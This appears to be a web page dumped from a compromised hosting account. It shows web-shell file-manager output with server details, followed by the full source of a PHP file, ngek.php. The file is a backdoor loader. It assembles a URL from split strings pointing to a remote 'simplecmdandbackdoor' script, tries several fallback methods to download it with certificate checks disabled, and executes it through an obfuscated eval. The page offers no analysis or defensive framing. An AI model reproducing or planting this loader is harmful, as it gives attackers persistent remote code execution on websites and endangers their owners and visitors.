PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Notice: ob_end_clean(): Failed to delete buffer. No buffer to delete in /home/foruwedy/public_html/57dae0/index.php on line 8
$#$#$#

Dir : /home/foruwedy/www/
Server: Linux premium227.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
IP: 66.29.146.38
Choose File :

Url:
Dir : /home/foruwedy/www/ngek.php

<?php

$u = "htt";
$d = "ps://";
$a = "raw.githubusercontent";
$Ç = ".com/Yucaerin/";
$n = "simplecmdandbackdoor/refs/heads/main";
$ur = "/ngetes8.php";
$url = $u . $d . $a . $Ç . $n . $ur;

function fetchContentWithFileGetContents($url) {
    if (ini_get('allow_url_fopen')) {
        return @file_get_contents($url);
    }
    return false;
}

function fetchContentWithCurl($url) {
    if (function_exists('curl_version')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        $response = curl_exec($ch);
        $error = curl_error($ch);
        curl_close($ch);
        return $error ? false : $response;
    }
    return false;
}

function fetchContentWithFopen($url) {
    if ($file = fopen($url, 'r')) {
        $content = stream_get_contents($file);
        fclose($file);
        return $content;
    }
    return false;
}

function fetchContentWithStreamContext($url) {
    $context = stream_context_create([
        "http" => [
            "method" => "GET",
            "header" => "User-Agent: PHP script\r\n"
        ]
    ]);
    return @file_get_contents($url, false, $context);
}

function fetchContentWithFile($url) {
    $lines = @file($url);
    if ($lines === false) {
        return false;
    }
    return implode('', $lines);
}

function fetchContent($url) {
    $content = fetchContentWithFileGetContents($url);
    if ($content === false) {
        $content = fetchContentWithCurl($url);
    }
    if ($content === false) {
        $content = fetchContentWithFopen($url);
    }
    if ($content === false) {
        $content = fetchContentWithStreamContext($url);
    }
    if ($content === false) {
        $content = fetchContentWithFile($url);
    }
    return $content;
}

function obfuscatedEval($content) {
    $evalFunc = 'e'.'v'.'a'.'l';
    if (empty($content)) {
        return;
    }
    if (@eval("?>".$content) === false) {
        return;
    }
    $evalFunc("?>" . $content);
}

$content = fetchContent($url);

if ($content !== false) {
    obfuscatedEval($content);
} else {
    echo "¨éü: Gagal mengambil konten.";
}
?>